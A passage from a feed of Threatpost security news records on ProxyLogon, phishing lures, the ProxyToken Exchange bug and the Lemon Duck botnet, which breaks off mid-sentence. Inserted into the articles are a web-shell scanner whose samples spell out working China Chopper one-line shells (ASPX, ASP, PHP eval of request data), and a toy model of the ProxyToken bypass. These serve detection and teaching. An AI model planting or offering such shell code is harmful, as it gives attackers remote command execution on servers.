It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to exploit vulnerable Exchange servers, the public PoCs mean the cat is officially out of the bag: less sophisticated cybercriminals can now leverage the opportunity.\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. \u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dormann of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. 
And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to a [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its [post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. 
One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. 
The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, the Microsoft Active Protections Program (MAPP), according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. 
We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool mitigates exploitation of the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and also scans the server with the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify and remediate any existing compromise.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the Hafnium APT first flagged by Microsoft is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. 
Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. 
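The one-line server side described above is easy to recognize on disk precisely because it is one line: a dynamic eval whose argument comes straight out of the request, with the JScript "unsafe" flag. The following is an added Python example, not Trustwave's or Microsoft's tooling and not code from the article, that walks a web root and flags files of that shape. It generalizes past the JScript ASPX variant discussed on this page to the classic ASP and PHP one-liners of the same family. The sample shells are constructed from those well-known public forms (the parameter name "secret" follows the page; "pass" is a placeholder), and the file-extension list is my own choice.

```python
"""Scan a web root for China Chopper-style one-line web shells.

Added example, not the page's or Trustwave's code. SAMPLES are constructed from
the well-known public forms of the family, not recovered from a victim.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, NamedTuple

Q = r"""["']"""               # either quote character
ARG = Q + r"[^'\"]+" + Q      # a quoted parameter name such as "secret"

# Each pattern keys on the family's one structural feature: a dynamic
# eval/execute whose argument is read directly from the HTTP request.
PATTERNS = [
    ("aspx-jscript-eval",   # eval(Request.Item["secret"],"unsafe")
     re.compile(r"eval\s*\(\s*Request(?:\.Item)?\s*\[\s*" + ARG + r"\s*\]\s*,\s*" + Q + "unsafe" + Q, re.I)),
    ("asp-eval-request",    # eval request("pass")
     re.compile(r"\beval\s*\(?\s*request\s*\(\s*" + ARG + r"\s*\)", re.I)),
    ("php-eval-post",       # @eval($_POST['pass'])
     re.compile(r"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*" + ARG + r"\s*\]\s*\)", re.I)),
]

# Extensions the web server will execute; my own list, extend to taste.
WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}


class Finding(NamedTuple):
    path: str
    pattern: str
    size: int
    snippet: str


def scan_text(text: str) -> List[str]:
    """Names of the shell patterns that match this source text (empty if clean)."""
    return [name for name, rx in PATTERNS if rx.search(text)]


def scan_file(path: Path) -> List[Finding]:
    if path.suffix.lower() not in WEB_EXTENSIONS:
        return []
    data = path.read_text(encoding="utf-8", errors="replace")
    return [Finding(str(path), name, len(data), data.strip()[:80]) for name in scan_text(data)]


def scan_tree(root: Path) -> List[Finding]:
    """Recursively scan every executable web file under root."""
    findings: List[Finding] = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            findings.extend(scan_file(p))
    return findings


# Constructed samples: three one-liners from the family and one benign page.
SAMPLES: Dict[str, str] = {
    "chopper.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["secret"],"unsafe");%>',
    "chopper.asp": '<%eval request("pass")%>',
    "chopper.php": "<?php @eval($_POST['pass']);?>",
    "logon.aspx": '<%@ Page Language="C#" %><html><body>Sign in</body></html>',
}


def scan_samples() -> Dict[str, List[str]]:
    return {name: scan_text(src) for name, src in SAMPLES.items()}


def write_samples(target: Path) -> None:
    target.mkdir(parents=True, exist_ok=True)
    for name, src in SAMPLES.items():
        (target / name).write_text(src, encoding="utf-8")


def scan_sample_tree() -> List[str]:
    """Write the samples into a temp dir, scan it, return the matched pattern names."""
    root = Path(tempfile.mkdtemp(prefix="chopper-scan-"))
    write_samples(root)
    return sorted(f.pattern for f in scan_tree(root))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        root = Path(sys.argv[1])
    else:
        root = Path(tempfile.mkdtemp(prefix="chopper-scan-"))
        write_samples(root)
    for f in scan_tree(root):
        print(f"{f.path}: {f.pattern} ({f.size} bytes) {f.snippet!r}")
```

Point it at the IIS web root (the inetpub tree and the Exchange FrontEnd directories) and treat any hit as a starting point, not a verdict: attackers also drop obfuscated and multi-line shells that this shape-based check will miss, so pair it with a review of recently modified .aspx files and the IIS logs for POSTs to them.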
\u201cAll this is made available just from the one line of code running on the server.\u201d\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-05T14:08:09", "description": "Innovative twists on [banking scams and corporate-account hunters](<https://securelist.com/spam-and-phishing-in-q1-2021/102018/>) wielding increasingly clever lures, including those with COVID-19 vaccine promises, are likely to dominate the spam and phishing landscape throughout Q2 2021, according to researchers.\n\nAnd although no new wild trends have emerged, Kaspersky researchers, who just released their report for Q1 2021, said that the [spear-phishing tactics](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attackers are using against victims are getting better.\n\n## **Bank-Scam, QR-Code Phishing Lures **\n\nFor instance, mobile banking scams aren\u2019t anything new; however, attackers have developed a couple of new 
approaches.\n\nIn one example from Q1 2021, Kaspersky reported that clients of several Dutch banks received a fraud email which prompted them to [scan a QR code](<https://threatpost.com/qr-codes-cyberattack-usage-spikes/165526/>) to \u201cunlock\u201d mobile banking. Instead, they were directed to a web page loaded with malware.\n\n[QR codes](<https://threatpost.com/anti-vaxxer-hijacks-qr-codes-covid19/165701/>) are an increasingly popular tool for threat actors, especially since the pandemic. They have been used to access menus, check in for vaccines and get public information.\n\nAnother banking scam observed by Kaspersky researchers delivered a fake newsletter posing as legitimate correspondence from MKB bank with updates on COVID-19, but instead delivered a scam Outlook sign-in page, attempting to harvest credentials.\n\nOther [phishing lures](<https://threatpost.com/buer-malware-loader-rewritten-rust/165782/>) observed last quarter by Kaspersky included offers of government payouts, intended to steal credit-card information and personal data.\n\n## **COVID-19 Vaccine Lures **\n\nCOVID-19 vaccines are the most important topic around the world at the moment, and malicious actors have capitalized on this over the past several weeks.\n\nA scam COVID-19 vaccination lure. Source: Kaspersky.\n\n\u201cCybercriminals took advantage of people\u2019s desire to get vaccinated as quickly as possible,\u201d according to the report. \u201cFor instance, some U.K. 
residents received an email that appeared to come from the country\u2019s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link.\u201d\n\nAnother particularly despicable [COVID scam email](<https://threatpost.com/mcafee-covid-rpowershell-malware-surge/165382/>) specifically targeted people over 65 seeking a vaccine, the researchers added.\n\n\u201cIn both cases, to make a vaccination appointment, a form had to be filled out with personal data; and in the first case, the phishers also wanted bank-card details,\u201d the report explained. \u201cIf the victim followed all the instructions on the fake website, they handed their money and personal data to the attackers.\u201d\n\nFraudsters also blasted out [scam vaccination](<https://threatpost.com/europol-covid-19-vaccine-rollout-fraud-theft/161968/>) surveys, which were emails doctored up to look like they were from pharmaceutical companies making vaccines, asking for input.\n\n\u201cParticipants were promised a gift or cash reward for their help,\u201d the report added. \u201cAfter answering the questions, the victim was redirected to a page with the \u2018gift.\u2019\u201d\n\nThe victim was then asked for personal information, or in some cases, even payment information to pay for delivery of the \u201cprize.\u201d\n\nScammers also sent emails convincingly disguised to look like they were sent from Chinese vaccine-makers.\n\n## **Hunt for Corporate Credentials Is On **\n\nA bogus mobile QR-code lure. Source: Kaspersky.\n\nBecause consumers are getting better at spotting scams, attackers are getting expert at making their communications seem real. 
This is especially important in trying to score what Kaspersky calls \u201ca coveted prize for scammers:\u201d [corporate usernames and passwords](<https://threatpost.com/sharepoint-phish-ransomware-attacks/165671/>).\n\n\u201cTo counter people\u2019s increasingly wary attitude to emails from outside, attackers try to give their mailings a respectable look, disguising them as messages from business tools and services,\u201d Kaspersky said. \u201cBy blending into the workflow, the scammers calculate that the user will be persuaded to follow the link and enter data on a fake page.\u201d\n\nThe team observed a malicious link being delivered through Microsoft Planner, and in Russia, they discovered an email posing as a message from an analytics portal support team. Both asked for corporate-account credentials.\n\n\u201cOld techniques, such as creating a unique fake page using JavaScript, were combined in Q1 with overtly business-themed phishing emails,\u201d the report said. \u201cIf previously scammers used common, but not always business-oriented, services as bait, the new batch of emails cited an urgent document awaiting approval or contract in need of review.\u201d\n\n## **The \u2018Less is More\u2019 Lure **\n\nAnother interesting lure type highlighted by the Kaspersky report asks for just a tiny amount of money to complete the scam transaction. In one example the team gives, the criminals only asked for 1.99 Rubles ($.27).\n\n\u201cThe calculation was simple: Users would be less averse to paying a small amount than a larger one, which means more potential victims willing to enter card details on the bogus site,\u201d the report explained. The emails usually had themes around everyday services like deliveries, fake \u201cinvoices\u201d for domain usage or a WhatsApp subscription.\n\nFacebook users were targeted last quarter by a scam lure saying their accounts were in violation of the platform\u2019s terms of use, Kaspersky said. 
The first link went to a legitimate Facebook page to reassure the victim that it was real. But the second link went to a phishing site.\n\n\u201cThe attackers\u2019 calculation was simple: First lull the victim\u2019s vigilance with a legitimate link, then get them to enter their credentials on a fake page,\u201d the report explained.\n\nOverall, spam traffic was down a bit (by 2.1 percent) in Q1. The Russian-language internet (\u201cRunet\u201d) also saw a small drop in spam of less than 2 percent, the report added. Russia accounted for the largest share of outgoing spam with 22.47 percent, followed by Germany with 14.89 percent, Kaspersky found. The U.S. and China meanwhile followed with 12.98 percent and 7.38 percent of the world\u2019s spam traffic.\n\nMalicious email attachments detected were also down, but Kaspersky points out that this is primarily due to a boost in the number of attachments blocked by mail antivirus.\n\n## **Malware Families on the Rise **\n\nThe most common malicious attachments for spam emails in the quarter were from the Agensla malware family, according to Kaspersky, accounting for 8.91 percent of detected malicious attachments; exploits for the Microsoft Equation Editor vulnerability CVE-2017-11882 were second. The Badun family was third with 5.79 percent.\n\n\u201cThe Top 10 most common malicious attachments in Q4 corresponds exactly to the ranking of families,\u201d the report explained. \u201cThis suggests that each of the above-described families was widespread largely due to one member.\u201d\n\nOnline stores remain the most popular impersonation targets for phishing pages, the report added, accounting for 15.77 percent of those observed, Kaspersky said. 
Global internet portals (15.5 percent) and banks (10.04 percent) were close behind.\n\nFinally, Kaspersky warns about a potential slight uptick in tourism-related bait around the corner.\n\n\u201cAnd as the summer season approaches, an increase in the number of emails related to tourism is possible; however, due to the pandemic, it is likely to be small,\u201d the report said. \u201cOn the other hand, cybercriminals will almost certainly continue to actively hunt corporate-account credentials, exploiting the fact that many companies are still in remote-working mode and communication among employees is predominantly online.\u201d\n", "cvss3": {}, "published": "2021-05-04T13:46:19", "type": "threatpost", "title": "Phishers Delivering Increasingly Convincing Lures", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2021-22893"], "modified": "2021-05-04T13:46:19", "id": "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "href": "https://threatpost.com/bait-phishers-convincing-lures/165834/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. 
These requests contain a SecurityToken cookie that identifies them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, an attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. 
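The failure described above is a split-responsibility bug: the front end delegates whenever it sees a non-empty SecurityToken cookie, and a back end without DelegatedAuthModule never checks the token, so neither side authenticates the request. The following is an added Python model of that logic, not Exchange's code and not Microsoft's patch: the class names, the token table and the fail-closed variant are all my own simplifications, kept only to show why delegation must fail closed when the component meant to validate it is not configured.

```python
"""Toy model of the ProxyToken delegated-authentication bypass.

Added illustration; nothing here is Exchange code. FrontEnd, BackEnd,
VALID_TOKENS and fail_closed are invented for the model.
"""
from dataclasses import dataclass, field
from typing import Dict, Optional

# Constructed token store: the back end can vouch for these SecurityToken
# values only when its delegated-auth module is loaded.
VALID_TOKENS = {"tok-alice-7f3a": "alice@example.test"}


@dataclass
class Request:
    path: str
    cookies: Dict[str, str] = field(default_factory=dict)
    forms_user: Optional[str] = None  # session the front end itself verified; None = anonymous


@dataclass
class Response:
    status: int
    user: Optional[str] = None
    note: str = ""


@dataclass
class BackEnd:
    delegated_auth_module_loaded: bool
    fail_closed: bool = False  # hardened behaviour; off by default in the model

    def handle(self, req: Request, delegated: bool, user: Optional[str]) -> Response:
        if not delegated:
            # Front end authenticated this request itself and tells us who it is.
            return Response(200, user, "front-end authenticated")
        if self.delegated_auth_module_loaded:
            who = VALID_TOKENS.get(req.cookies.get("SecurityToken", ""))
            return Response(200, who, "back-end validated token") if who else Response(401, None, "bad token")
        if self.fail_closed:
            return Response(401, None, "delegation requested but nothing here can validate it")
        # The bug: no component validated the request, yet it is served.
        return Response(200, None, "served without any authentication")


@dataclass
class FrontEnd:
    backend: BackEnd

    def handle(self, req: Request) -> Response:
        if req.cookies.get("SecurityToken"):  # non-empty cookie => delegate to the back end
            return self.backend.handle(req, delegated=True, user=None)
        if req.forms_user is None:
            return Response(401, None, "front-end forms auth failed")
        return self.backend.handle(req, delegated=False, user=req.forms_user)


def scenario(module_loaded: bool, fail_closed: bool,
             token: Optional[str], forms_user: Optional[str]) -> Response:
    """Send one request for a mailbox-configuration endpoint through the model."""
    fe = FrontEnd(BackEnd(module_loaded, fail_closed))
    cookies = {"SecurityToken": token} if token is not None else {}
    return fe.handle(Request("/ecp/inboxrules", cookies, forms_user))


def default_config_bypass() -> Response:
    """Default install (module not loaded), anonymous client, any non-empty cookie."""
    return scenario(module_loaded=False, fail_closed=False, token="anything", forms_user=None)


if __name__ == "__main__":
    cases = [
        ("default config, bogus token, anonymous", scenario(False, False, "anything", None)),
        ("fail-closed back end, bogus token", scenario(False, True, "anything", None)),
        ("module loaded, bogus token", scenario(True, False, "anything", None)),
        ("module loaded, valid token", scenario(True, False, "tok-alice-7f3a", None)),
        ("no cookie, valid forms session", scenario(False, False, None, "alice@example.test")),
        ("no cookie, anonymous", scenario(False, False, None, None)),
    ]
    for label, r in cases:
        print(f"{label:40s} -> {r.status} user={r.user} ({r.note})")
```

The lesson the model isolates is the one to carry into any proxy-plus-backend design: a front end must not hand authentication to a downstream component based on a client-controlled signal unless it can confirm that component is actually configured to perform it, and the downstream side should reject delegated requests it has no means to validate rather than assume the proxy did the work.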
Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain comprised of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T06:29:15", "description": "The Lemon Duck cryptocurrency-mining botnet has added the [ProxyLogon group of exploits](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) to its bag of tricks, targeting Microsoft Exchange servers.\n\nThat\u2019s according to researchers at Cisco Talos, who said that the cybercrime group behind Lemon Duck has also added the Cobalt Strike attack framework into its malware toolkit and has beefed up anti-detection capabilities. On the latter front, it\u2019s using fake domains on East Asian top-level domains (TLDs) to hide command-and-control (C2) infrastructure.\n\nLemon Duck targets victims\u2019 computer resources to mine the Monero virtual currency, with self-propagating capabilities and a modular framework that allows it to infect additional systems that become part of the botnet. 
It has been active since at least the end of December 2018, and Cisco Talos calls it \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve.\n\nFor instance, Lemon Duck has at least 12 different initial-infection vectors \u2013 more than most malware, with ProxyLogon exploits only the latest addition. Its existing capabilities ranged from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing; targeting the RDP BlueKeep flaw (CVE-2019-0708) in Windows machines; [targeting internet-of-things devices](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) with weak or default passwords; and exploiting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n\u201cSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the Lemon Duck that target unpatched Microsoft Exchange Servers and attempt to download and execute payloads for Cobalt Strike DNS beacons,\u201d according to [an analysis](<https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html>) released Friday.\n\nCisco Talos researchers [previously observed](<https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/>) an increase in DNS requests connected with Lemon Duck\u2019s C2 and mining servers last August, with the attacks mainly targeting Egypt, India, Iran, the Philippines and Vietnam. 
In the latest rash of attacks, which began in April, the group has changed up its geographic targets to focus primarily on North America, followed by Europe and Southeast Asia, and a handful of victims in Africa and South America.\n\n## **Targeting Exchange Servers with Monero-Mining**\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the deployment of ransomware.\n\nThe highly publicized exploit chain suffered a barrage of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to info-stealers, and now financially motivated groups are getting in on the action too.\n\nIn Lemon Duck\u2019s case, once the Exchange servers are compromised, it executes various system commands using the Windows Control Manager (sc.exe), including copying two .ASPX files named \u201cwanlins.aspx\u201d and \u201cwanlin.aspx.\u201d\n\n\u201cThese files are likely web shells and were copied from 